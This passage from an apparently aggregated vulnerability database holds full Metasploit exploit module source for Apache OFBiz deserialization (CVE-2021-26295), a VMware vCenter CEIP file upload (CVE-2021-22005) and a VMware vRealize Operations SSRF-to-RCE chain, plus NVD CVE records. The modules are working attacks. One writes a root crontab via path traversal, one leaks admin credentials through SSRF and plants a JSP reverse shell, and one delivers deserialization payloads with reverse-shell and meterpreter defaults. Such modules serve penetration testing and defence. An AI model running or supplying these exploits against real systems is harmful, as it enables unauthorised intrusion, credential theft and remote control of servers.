{}\n res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|\n key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s\n messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s\n end\n\n if 
messages['errorMessage']&.start_with?('Problem deserializing object from byte array')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_soap(\n # framework/webapp/lib/rome-0.9.jar\n generate_java_deserialization_for_command('ROME', 'bash', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_soap(data)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header/>\n <soapenv:Body>\n <ser>\n <map-HashMap>\n <map-Entry>\n <map-Key>\n <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>\n </map-Key>\n <map-Value>\n <std-String value=\"http://#{Faker::Internet.domain_name}\"/>\n </map-Value>\n </map-Entry>\n </map-HashMap>\n </ser>\n </soapenv:Body>\n </soapenv:Envelope>\n XML\n )\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. 
CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. 
CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n 
unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T15:13:04", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin 
creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule 
< Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. 
Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? 
CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n 
fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:31:00", "description": "Apache OFBiz has unsafe deserialization prior to 17.12.06. 
An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T12:15:00", "type": "cve", "title": "CVE-2021-26295", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-09-16T15:44:00", "cpe": [], "id": "CVE-2021-26295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:21:46", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 
7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:vrealize_operations_manager:8.2.0", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.5.1", 
"cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.0.1.1"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:53", "description": "The vCenter 
Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T12:15:00", "type": "cve", "title": "CVE-2021-22005", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-30T22:36:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-22005", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2023-05-27T14:46:54", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "zdt", "title": "Apache OFBiz SOAP Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-07T00:00:00", "id": "1337DAY-ID-36080", "href": "https://0day.today/exploit/description/36080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n XML_NS = {\n 'serResponse' => 'http://ofbiz.apache.org/service/',\n 'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'\n }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache OFBiz SOAP Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for\n versions prior to 17.12.06.\n },\n 'Author' => [\n 'yumusb', # original PoC\n 
'Spencer McIntyre', # metasploit module\n 'wvu' # metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-26295' ],\n [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],\n [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]\n ],\n 'DisclosureDate' => '2021-03-22', # NVD publish date\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_soap('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n messages = {}\n res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|\n key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s\n messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s\n end\n\n if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def 
exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_soap(\n # framework/webapp/lib/rome-0.9.jar\n generate_java_deserialization_for_command('ROME', 'bash', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_soap(data)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header/>\n <soapenv:Body>\n <ser>\n <map-HashMap>\n <map-Entry>\n <map-Key>\n 